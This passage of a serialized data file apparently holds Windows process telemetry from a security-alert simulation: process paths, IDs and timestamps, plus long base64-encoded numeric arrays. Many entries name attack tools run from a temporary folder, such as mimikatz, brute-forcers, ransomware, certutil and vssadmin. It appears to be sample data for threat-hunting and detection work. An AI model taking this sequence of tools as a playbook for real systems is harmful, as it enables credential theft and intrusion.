05:15:13.867000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1724|2019-01-15 05:15:14.033000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1744|2019-01-15 05:15:14.100000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x1758|2019-01-15 05:15:14.157000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1778|2019-01-15 05:15:14.227000\",\"c:\\\\windows\\\\fonts\\\\csrss.exe|0x178c|2019-01-15 05:15:14.293000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x17ac|2019-01-15 05:15:14.377000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x17bc|2019-01-15 05:15:14.453000\",\"c:\\\\windows\\\\system32\\\\werfault.exe|0x17dc|2019-01-15 05:15:14.490000\",\"c:\\\\windows\\\\fonts\\\\conhost.exe|0x17e4|2019-01-15 05:15:14.493000\",\"c:\\\\diagnostics\\\\usertmp\\\\mimikatz.exe|0x1440|2019-01-15 05:15:14.563000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x1434|2019-01-15 05:15:14.613000\",\"c:\\\\windows\\\\fonts\\\\conhost.exe|0x1424|2019-01-15 05:15:14.640000\",\"c:\\\\diagnostics\\\\usertmp\\\\regsvr32.exe|0x123c|2019-01-15 05:15:14.693000\",\"c:\\\\windows\\\\system32\\\\tasklist.exe|0x240|2019-01-15 05:15:14.770000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1490|2019-01-15 05:15:15.160000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x1464|2019-01-15 05:15:15.183000\",\"c:\\\\windows\\\\system32\\\\whoami.exe|0x142c|2019-01-15 05:15:15.233000\",\"c:\\\\windows\\\\system32\\\\hostname.exe|0x14b0|2019-01-15 05:15:15.283000\",\"c:\\\\windows\\\\system32\\\\netstat.exe|0x14c0|2019-01-15 05:15:15.317000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x14fc|2019-01-15 05:15:15.440000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x14f0|2019-01-15 05:15:15.457000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x14e8|2019-01-15 05:15:15.483000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x152c|2019-01-15 05:15:15.500000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1520|2019-01-15 05:15:15.520000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x1514|2019-01-15 05:15:15.533000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x1550|2019-01-15 05:15:15.553000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x1560|2019-01-15 05:15:15.570000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x1584|2019-01-15 05:15:15.620000\",\"c:\\\\diagnostics\\\\usertmp\\\\ftp.exe|0x1580|2019-01-15 05:15:15.677000\",\"c:\\\\diagnostics\\\\usertmp\\\\dubrute.exe|0x15c0|2019-01-15 05:15:15.727000\",\"c:\\\\diagnostics\\\\usertmp\\\\nlbrute.exe|0x1600|2019-01-15 05:15:15.777000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x15f0|2019-01-15 05:15:15.827000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x162c|2019-01-15 05:15:15.880000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x166c|2019-01-15 05:15:15.923000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1660|2019-01-15 05:15:15.950000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x1658|2019-01-15 05:15:15.967000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x169c|2019-01-15 05:15:16.020000\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe|0x168c|2019-01-15 05:15:16.067000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x16c8|2019-01-15 05:15:16.117000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x16fc|2019-01-15 05:15:16.167000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1700|2019-01-15 05:15:16.277000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x1728|2019-01-15 05:15:16.340000\",\"c:\\\\diagnostics\\\\usertmp\\\\42424.exe|0x1738|2019-01-15 05:15:16.353000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x175c|2019-01-15 05:15:16.400000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x176c|2019-01-15 05:15:16.430000\",\"c:\\\\diagnostics\\\\usertmp\\\\1234.exe|0x17a8|2019-01-15 05:15:16.447000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x17a0|2019-01-15 05:15:16.500000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x17cc|2019-01-15 05:15:16.510000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x17e8|2019-01-15 05:15:16.520000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x143c|2019-01-15 05:15:16.563000\",\"c:\\\\diagnostics\\\\usertmp\\\\tsetup.1.exe|0x1064|2019-01-15 05:15:16.613000\",\"c:\\\\diagnostics\\\\usertmp\\\\rundll32.exe|0x1434|2019-01-15 05:15:16.663000\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe|0xbb4|2019-01-15 05:15:16.677000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1404|2019-01-15 05:15:16.720000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x148c|2019-01-15 05:15:16.767000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1464|2019-01-15 05:15:16.807000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x14b8|2019-01-15 05:15:16.850000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x14ec|2019-01-15 05:15:16.893000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x14f0|2019-01-15 05:15:16.967000\",\"c:\\\\diagnostics\\\\usertmp\\\\perfc.dat|0x14e8|2019-01-15 05:15:17.020000\",\"c:\\\\diagnostics\\\\usertmp\\\\sdopfjiowtbkjfnbeioruj.exe|0x1564|2019-01-15 05:15:17.077000\",\"c:\\\\diagnostics\\\\usertmp\\\\doubleextension.pdf.exe|0x155c|2019-01-15 05:15:17.127000\",\"c:\\\\windows\\\\system32\\\\vssadmin.exe|0x1550|2019-01-15 05:15:17.137000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1560|2019-01-15 05:15:17.217000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x158c|2019-01-15 05:15:17.220000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x15d0|2019-01-15 05:15:17.257000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x15c8|2019-01-15 05:15:17.363000\",\"c:\\\\diagnostics\\\\usertmp\\\\svchost.exe|0x15ec|2019-01-15 05:15:17.410000\",\"c:\\\\diagnostics\\\\usertmp\\\\smss.exe|0x15e8|2019-01-15 05:15:17.457000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1630|2019-01-15 05:15:17.493000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1668|2019-01-15 05:15:17.520000\",\"c:\\\\diagnostics\\\\usertmp\\\\asc_alerttest_662jfi039n.exe|0x1658|2019-01-15 05:15:17.570000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x1664|2019-01-15 05:15:17.580000\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe|0x16d4|2019-01-15 05:15:17.650000\",\"c:\\\\diagnostics\\\\usertmp\\\\wuauclt.exe|0x16c0|2019-01-15 05:15:18.080000\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe|0x1704|2019-01-15 05:15:18.147000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x16fc|2019-01-15 05:15:18.230000\",\"c:\\\\diagnostics\\\\usertmp\\\\lsass.exe|0x16f4|2019-01-15 05:15:18.287000\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe|0x1770|2019-01-15 05:15:18.300000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x1774|2019-01-15 05:15:18.320000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1728|2019-01-15 05:15:18.337000\",\"c:\\\\diagnostics\\\\usertmp\\\\cacls.exe|0x1798|2019-01-15 05:15:18.403000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1758|2019-01-15 05:15:18.450000\",\"c:\\\\diagnostics\\\\usertmp\\\\2840.exe|0x17a8|2019-01-15 05:15:18.500000\",\"c:\\\\diagnostics\\\\usertmp\\\\a_keygen.exe|0x17f8|2019-01-15 05:15:18.547000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x17cc|2019-01-15 05:15:18.553000\",\"c:\\\\diagnostics\\\\usertmp\\\\bittorrent.exe|0x1414|2019-01-15 05:15:18.630000\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe|0x28c|2019-01-15 05:15:18.670000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0xc18|2019-01-15 05:15:18.707000\",\"c:\\\\diagnostics\\\\usertmp\\\\ransomware.exe|0x1404|2019-01-15 05:15:18.770000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x147c|2019-01-15 05:15:18.820000\",\"c:\\\\diagnostics\\\\usertmp\\\\pcalua.exe|0x1464|2019-01-15 05:15:18.867000\",\"c:\\\\diagnostics\\\\usertmp\\\\findstr.exe|0x14b8|2019-01-15 05:15:18.917000\",\"c:\\\\diagnostics\\\\usertmp\\\\odbcconf.exe|0x14ec|2019-01-15 05:15:18.967000\",\"c:\\\\diagnostics\\\\usertmp\\\\odbcconf.exe|0x14f0|2019-01-15 05:15:19.010000\",\"c:\\\\diagnostics\\\\usertmp\\\\sqldumper.exe|0x14e8|2019-01-15 05:15:19.060000\",\"c:\\\\diagnostics\\\\usertmp\\\\mt.exe|0x1564|2019-01-15 05:15:19.127000\",\"c:\\\\diagnostics\\\\usertmp\\\\mt.exe|0x155c|2019-01-15 05:15:19.180000\",\"c:\\\\diagnostics\\\\usertmp\\\\hd.exe|0x15b8|2019-01-15 05:15:19.223000\",\"c:\\\\diagnostics\\\\usertmp\\\\hd.exe|0x15d0|2019-01-15 05:15:19.337000\",\"c:\\\\diagnostics\\\\usertmp\\\\netsh.exe|0x158c|2019-01-15 05:15:19.403000\",\"c:\\\\diagnostics\\\\usertmp\\\\certutil.exe|0x1638|2019-01-15 05:15:19.447000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x1624|2019-01-15 05:15:19.490000\",\"c:\\\\diagnostics\\\\usertmp\\\\reg.exe|0x1628|2019-01-15 05:15:19.537000\",\"c:\\\\windows\\\\system32\\\\sc.exe|0x1654|2019-01-15 05:15:19.583000\",\"c:\\\\windows\\\\system32\\\\sc.exe|0x169c|2019-01-15 05:15:19.617000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe|0x10f4|2019-01-15 04:23:43.103000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x10cc|2019-01-15 04:28:01.517000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x1694|2019-01-15 05:15:20.623000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0xab8|2019-01-15 04:28:33.090000\",\"c:\\\\windows\\\\system32\\\\musnotification.exe|0xd80|2019-01-15 04:42:25.437000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x230|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\servicing\\\\trustedinstaller.exe|0x90c|2019-01-15 05:15:04.507000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xbdc|2019-01-15 05:15:10.817000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x17c0|2019-01-15 05:15:14.453000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0xbdc|2019-01-15 04:35:15.673000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0xa40|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x690|2019-01-15 04:43:05.240000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x6d4|2019-01-15 04:43:05.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1388|2019-01-15 04:44:37.180000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x11c8|2019-01-15 04:44:37.193000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x77c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\dism.exe|0x132c|2019-01-15 05:15:03.543000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x4e8|2019-01-15 05:15:03.550000\",\"c:\\\\windows\\\\temp\\\\cc563bbe-de32-44d3-8e35-f3fc78e72e40\\\\dismhost.exe|0x97c|2019-01-15 05:15:03.850000\"],\"source_index\":[\"363\",\"0\",\"1\",\"2\",\"10\",\"102\",\"103\",\"104\",\"105\",\"107\",\"108\",\"109\",\"110\",\"11\",\"12\",\"112\",\"113\",\"114\",\"115\",\"117\",\"118\",\"119\",\"120\",\"122\",\"123\",\"124\",\"125\",\"127\",\"128\",\"130\",\"131\",\"133\",\"134\",\"135\",\"136\",\"137\",\"138\",\"14\",\"140\",\"141\",\"142\",\"143\",\"145\",\"146\",\"147\",\"148\",\"15\",\"150\",\"151\",\"152\",\"153\",\"155\",\"156\",\"157\",\"158\",\"16\",\"17\",\"161\",\"162\",\"163\",\"164\",\"166\",\"19\",\"20\",\"22\",\"23\",\"25\",\"26\",\"27\",\"28\",\"30\",\"31\",\"33\",\"34\",\"338\",\"339\",\"340\",\"342\",\"343\",\"344\",\"345\",\"347\",\"348\",\"349\",\"350\",\"352\",\"353\",\"354\",\"355\",\"357\",\"358\",\"359\",\"360\",\"36\",\"362\",\"38\",\"39\",\"40\",\"4\",\"42\",\"43\",\"44\",\"45\",\"47\",\"48\",\"5\",\"50\",\"51\",\"53\",\"56\",\"57\",\"58\",\"6\",\"7\",\"60\",\"61\",\"62\",\"63\",\"65\",\"66\",\"67\",\"68\",\"70\",\"71\",\"72\",\"73\",\"76\",\"79\",\"80\",\"81\",\"83\",\"86\",\"87\",\"89\",\"90\",\"9\",\"92\",\"93\",\"94\",\"95\",\"97\",\"98\",\"99\",\"100\",\"364\",\"101\",\"106\",\"111\",\"116\",\"121\",\"126\",\"129\",\"13\",\"132\",\"139\",\"144\",\"149\",\"154\",\"160\",\"165\",\"167\",\"18\",\"181\",\"24\",\"29\",\"3\",\"341\",\"346\",\"35\",\"351\",\"356\",\"361\",\"41\",\"46\",\"49\",\"52\",\"55\",\"59\",\"64\",\"69\",\"74\",\"8\",\"82\",\"88\",\"91\",\"96\",\"365\",\"159\",\"168\",\"169\",\"170\",\"171\",\"172\",\"173\",\"174\",\"175\",\"178\",\"182\",\"183\",\"184\",\"185\",\"186\",\"187\",\"189\",\"190\",\"191\",\"192\",\"193\",\"194\",\"195\",\"196\",\"197\",\"198\",\"204\",\"199\",\"203\",\"200\",\"202\",\"201\",\"205\",\"206\",\"207\",\"208\",\"209\",\"210\",\"211\",\"212\",\"213\",\"214\",\"215\",\"216\",\"217\",\"218\",\"219\",\"220\",\"221\",\"222\",\"223\",\"224\",\"225\",\"226\",\"227\",\"228\",\"229\",\"230\",\"231\",\"232\",\"233\",\"234\",\"235\",\"237\",\"238\",\"239\",\"240\",\"241\",\"242\",\"243\",\"244\",\"245\",\"246\",\"247\",\"248\",\"249\",\"250\",\"251\",\"252\",\"253\",\"254\",\"255\",\"256\",\"257\",\"258\",\"259\",\"260\",\"261\",\"262\",\"263\",\"264\",\"265\",\"266\",\"267\",\"268\",\"269\",\"270\",\"271\",\"272\",\"273\",\"274\",\"275\",\"276\",\"277\",\"278\",\"279\",\"280\",\"281\",\"282\",\"283\",\"284\",\"285\",\"286\",\"287\",\"288\",\"289\",\"290\",\"291\",\"292\",\"293\",\"294\",\"295\",\"296\",\"297\",\"298\",\"299\",\"300\",\"301\",\"302\",\"303\",\"304\",\"305\",\"306\",\"307\",\"308\",\"309\",\"310\",\"311\",\"312\",\"313\",\"314\",\"315\",\"316\",\"317\",\"318\",\"319\",\"320\",\"321\",\"322\",\"323\",\"324\",\"325\",\"326\",\"327\",\"328\",\"329\",\"330\",\"331\",\"332\",\"333\",\"334\",\"335\",\"336\",\"21\",\"32\",\"337\",\"37\",\"75\",\"366\",\"180\",\"188\",\"236\",\"54\",\"367\",\"77\",\"78\",\"84\",\"85\",\"368\",\"176\",\"177\",\"179\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAABQc0AAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAA8HNAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAACwdUAAAAAAAAD4fwAAAAAAQHBAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAABgdUAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAB2QAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAQHRAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAADwdEAAAAAAAAD4fwAAAAAAAPh/AAAAAAAwdUAAAAAAAAD4fwAAAAAAAPh/AAAAAACQdEAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAoG1AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAAFEAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAACRAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAABQcUAAAAAAAAD4fwAAAAAAAHNAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAACAUUAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAUHJAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAADAbkAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAPBwQAAAAAAAAPh/AAAAAAAA+H8AAAAAAPBxQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAADRAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAALEAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAJBzQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAAAAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAALBxQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAACQcEAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAIG5AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAABgZkAAAAAAAAD4fwAAAAAAgERAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAAQkAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAA/QAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAYG9AAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAACQckAAAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAcHZAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAA6QAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAGdAAAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBTQAAAAAAAwFJAAAAAAABAVEAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAIBWQAAAAAAAwFJAAAAAAAAAV0AAAAAAAMBSQAAAAAAAgFdAAAAAAADAUkAAAAAAAEBYQAAAAAAAwFJAAAAAAADAWEAAAAAAAMBSQAAAAAAAQFlAAAAAAADAUkAAAAAAAABeQAAAAAAAwFJAAAAAAACAXkAAAAAAAMBSQAAAAAAAwF5AAAAAAADAUkAAAAAAAABfQAAAAAAAwFJAAAAAAABAX0AAAAAAAMBSQAAAAAAAQGBAAAAAAADAUkAAAAAAAIBgQAAAAAAAwFJAAAAAAAAgYUAAAAAAAMBSQAAAAAAAYGFAAAAAAADAUkAAAAAAAABaQAAAAAAAwFJAAAAAAACAWkAAAAAAAMBSQAAAAAAAAFtAAAAAAADAUkAAAAAAAIBbQAAAAAAAwFJAAAAAAAAAXEAAAAAAAMBSQAAAAAAAgFxAAAAAAADAUkAAAAAAAABdQAAAAAAAwFJAAAAAAACAXUAAAAAAAMBSQAAAAAAAoGtAAAAAAADAUkAAAAAAAOBrQAAAAAAAwFJAAAAAAAAgbEAAAAAAAEBsQAAAAAAAQGxAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAAAAbUAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAIBhQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAAAgYkAAAAAAAMBSQAAAAAAAYGJAAAAAAADAUkAAAAAAAKBiQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAAAAZEAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAABIQAAAAAAAwFJAAAAAAADAUkAAAAAAAIBJQAAAAAAAwFJAAAAAAADAUkAAAAAAAABLQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAEBRQAAAAAAAwFJAAAAAAADAZEAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAABmQAAAAAAAIGZAAAAAAADAUkAAAAAAAMBnQAAAAAAA4GdAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAwFJAAAAAAADAUkAAAAAAAMBSQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAHBAAAAAAAAAcEAAAAAAANByQAAAAAAAAPh/AAAAAAAA+H8AAAAAAMBUQAAAAAAAwFRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[369]},\"timestamp_orig_par\":{\"__ndarray__\":\"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